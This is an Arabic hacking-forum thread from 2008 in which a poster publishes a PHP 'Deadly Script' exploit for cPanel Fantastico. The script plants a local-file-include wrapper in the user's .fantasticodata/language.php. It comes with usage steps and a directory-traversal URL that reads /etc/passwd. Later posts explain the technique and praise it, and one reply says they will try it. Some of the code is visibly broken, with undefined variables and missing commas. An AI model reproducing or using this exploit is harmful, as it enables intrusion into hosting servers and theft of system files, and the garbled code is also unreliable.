المشاركة في الموضوع

  #1  
قديم 11-29-2008, 06:58 PM
الصورة الرمزية لـ Super-Crystal
Super-Crystal Super-Crystal متصل الآن
رَُبان ْ هاَلمرَكبْ !
 
تاريخ التّسجيل: Oct 2006
الإقامة: Saudi Arabic
المشاركات: 1,436
شكراً: 25
تم شكره 45 مرة في 20 مشاركة
Super-Crystal قام بإلغاء خاصية الترشيح
إرسال رسالة عبر MSN إلى Super-Crystal إرسال رسالة عبر بريد الياهو إلى Super-Crystal Send a message via Skype™ to Super-Crystal
افتراضي Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"


كود PHP:
<?php
/*
######################################## 
# Deadly Script  by Super-Crystal 
# bypass Cpanel fantastico 
# www.arab4services.net
#        ##e-mail : l1un@hotmail.com , i-1@hotmail.com##
#######################################
*/
set_time_limit(0);
if(isset(
$_POST['sup3r'])) {
if(
stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
$phpwrapper '<?php
include_once("./language/".$_GET[sup3r].".php"); 
?>
'
;
fwrite($h,$prctl);
fclose($h);
$handle fopen($_POST['php'], "w");
fwrite($handle$phpwrapper);
fclose($handle);
echo 
"Building exploit...<br />";
echo 
"coding by Super-Crystal <br />";
echo 
"Cleaning up<br />";
echo 
"Done!<br />
</pre>"
;
} else {
echo 
"error : ".php_uname();
}
} else {
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
<tr>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">change</div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td>
</tr>
<tr>
</table>
</div>
<input type="hidden" name="sup3r" value="doit" />
<input name="submit" type="submit" value="Submit" /><br />
1- change /home/[user]/.fantasticodata/language.php
<br />
2- click on the submit
<br />
3- now put it like this (e.g) 
: http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .
<br />
<font color=red>Written: 10.10.2008</font><br />
<font color=blue>Public: 26.11.2008</font><br />
<div align="center">
<font color=red>Author : Super-Crystal</font><br />
<a href="http://www.arab4services.net">Arab4services.net </a></center>
</div>
</form>
<?php ?>
اي استفسارات ؟
__________________
أنا وحَبيبتي وأغاني محمّد عبدٌه !


آخر تعديل بواسطة Super-Crystal ، 11-30-2008 الساعة 12:58 AM
رد مع اقتباس

  #2  
قديم 11-29-2008, 07:05 PM
الصورة الرمزية لـ أبونجم
أبونجم أبونجم غير متصل
مجتمع حرس الأمني
 
تاريخ التّسجيل: Jul 2007
المشاركات: 88
شكراً: 0
تم شكره 4 مرة في 3 مشاركة
أبونجم is on a distinguished road
افتراضي

و أعاد احيائها :d

قدها يابوروان


خويك بونجم
__________________
A chain is only as strong as its weakest link
رد مع اقتباس

  #3  
قديم 11-29-2008, 07:14 PM
sarbot511 sarbot511 غير متصل
Member
 
تاريخ التّسجيل: Sep 2008
المشاركات: 12
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
sarbot511 is on a distinguished road
افتراضي

ابدااااع ما شااء الله انا كنت منتضر هالشئ تسلم .!!

iاعتقد ان الملف يغنيك عن الثغرة الي بالسيبنل وطريقت استغلالها الط
ويلة تسلم وما قصرت

آخر تعديل بواسطة sarbot511 ، 11-29-2008 الساعة 07:17 PM
رد مع اقتباس

  #4  
قديم 11-29-2008, 11:48 PM
KSA-Devil KSA-Devil غير متصل
وحـ ـيـ ـد
 
تاريخ التّسجيل: Sep 2008
المشاركات: 47
شكراً: 0
تم شكره 1 مرة في 1 مشاركة
KSA-Devil is on a distinguished road
افتراضي

اخيرا سوبر فضيت لسي بنل

يعطيك الف عافيه

تسلم على هذا الثغره بجربها
__________________
better tomorrow

رد مع اقتباس

  #5  
قديم 11-30-2008, 01:48 AM
الصورة الرمزية لـ Super-Crystal
Super-Crystal Super-Crystal متصل الآن
رَُبان ْ هاَلمرَكبْ !
 
تاريخ التّسجيل: Oct 2006
الإقامة: Saudi Arabic
المشاركات: 1,436
شكراً: 25
تم شكره 45 مرة في 20 مشاركة
Super-Crystal قام بإلغاء خاصية الترشيح
إرسال رسالة عبر MSN إلى Super-Crystal إرسال رسالة عبر بريد الياهو إلى Super-Crystal Send a message via Skype™ to Super-Crystal
افتراضي

ابونجم سربوت فهد حياكم الله منورين


بالنسبة للبعض يستفسر بالايميل عن الثغره مع اني كتبت فوق اي استفسارات ضعها هنا ...

عالعموم الاستثمار
/home/[user]/.fantasticodata/language.php
بعدها يتم تلغيم السي بنل (فنتاستكو) بثغره لوكال انكلود ..

مميزاتها
1- سيف مود اوف
2- دوال غير محجوبه
3- مود سكيورتي اوف
4- تقراء مجلد الروت
__________________
أنا وحَبيبتي وأغاني محمّد عبدٌه !

رد مع اقتباس

  #6  
قديم 11-30-2008, 11:03 PM
NooFa NooFa غير متصل
رحمة الله عليك
 
تاريخ التّسجيل: Dec 2006
المشاركات: 23
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
NooFa is on a distinguished road
افتراضي

قواك الله سوبر تمنيت بصراحه انك مانزلتها للعامه الله يكون بعون السيرفرات العربية
__________________
الله يرحمه و يغفر له و يعفو عنه و يوسع عليه في قبره ويجعله روضة من رياض الجنة .
الله يرحمه ويوسع قبره ويسهل امره ويغفر له كل ذنوبه
اللهم ارحمه برحمتك واسكنه فسيح جناتك ومن معه من موتي المسلمين
اللهم آمين
المتوفي: NooFa

محرر التوقيع: Super-Crystal

آخر تعديل بواسطة Super-Crystal ، 01-30-2010 الساعة 04:38 PM
رد مع اقتباس

  #7  
قديم 12-01-2008, 12:33 AM
هكر المقدس هكر المقدس غير متصل
Member
 
تاريخ التّسجيل: Nov 2008
المشاركات: 12
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
هكر المقدس is on a distinguished road
افتراضي

مشكور صديقي Super-Crystal على الموضوع رائع




المشاركة الأصلية بواسطة NooFa مشاهدة مشاركة
قواك الله سوبر تمنيت بصراحه انك مانزلتها للعامه الله يكون بعون السيرفرات العربية
بحب احكيلك شغله صديقي شو بدك تعمل فيها لو ضلت معك صرت اكره شي اسمه برايف يا اخي خلي الاعضاء تتعلم ليش كتم العلم وشكرا
رد مع اقتباس

  #8  
قديم 12-01-2008, 09:06 AM
دمعة فحل دمعة فحل غير متصل
Member
 
تاريخ التّسجيل: Oct 2008
المشاركات: 31
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
دمعة فحل is on a distinguished road
افتراضي

كثر خيرك سوبر وعساك على القوه
رد مع اقتباس

  #9  
قديم 12-02-2008, 10:21 AM
Saudi Scorpion Saudi Scorpion غير متصل
St3p f0r Th3 Futur3
 
تاريخ التّسجيل: Oct 2008
الإقامة: : ALJOUF :
المشاركات: 13
شكراً: 1
تم شكره 0 مرة في 0 مشاركة
Saudi Scorpion is on a distinguished road
إرسال رسالة عبر MSN إلى Saudi Scorpion
افتراضي

عوافي يا شنب
رد مع اقتباس

  #10  
قديم 12-02-2008, 10:35 PM
AnGeR_HaCkEr AnGeR_HaCkEr غير متصل
Member
 
تاريخ التّسجيل: Dec 2006
المشاركات: 8
شكراً: 0
تم شكره 0 مرة في 0 مشاركة
AnGeR_HaCkEr is on a distinguished road
افتراضي

ابدااااع ما شااء الله
رد مع اقتباس
المشاركة في الموضوع


مواضيع مشابهة
الموضوع كاتب الموضوع المنتدى الردود آخر مشاركة
Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass" Super-Crystal إكتشافاتنا [Exploits] 13 12-11-2008 10:20 PM

عدد الأعضاء الذي يتصفحون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

خيارات الموضوع بحث في هذا الموضوع
بحث في هذا الموضوع:

بحث متقدم
طريقة العرض قيّم هذا الموضوع
قيّم هذا الموضوع:

قوانين المشاركة
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is متاح
كود [IMG] متاح
كود HTML غير متاح

الانتقال السريع

إن كل طرح هو وجهة نظر خاصة بصاحبه توافقت مع معتقداتك أم لم تتفق !



خدمات العرب
أنت قيّمت هذا الموضوع: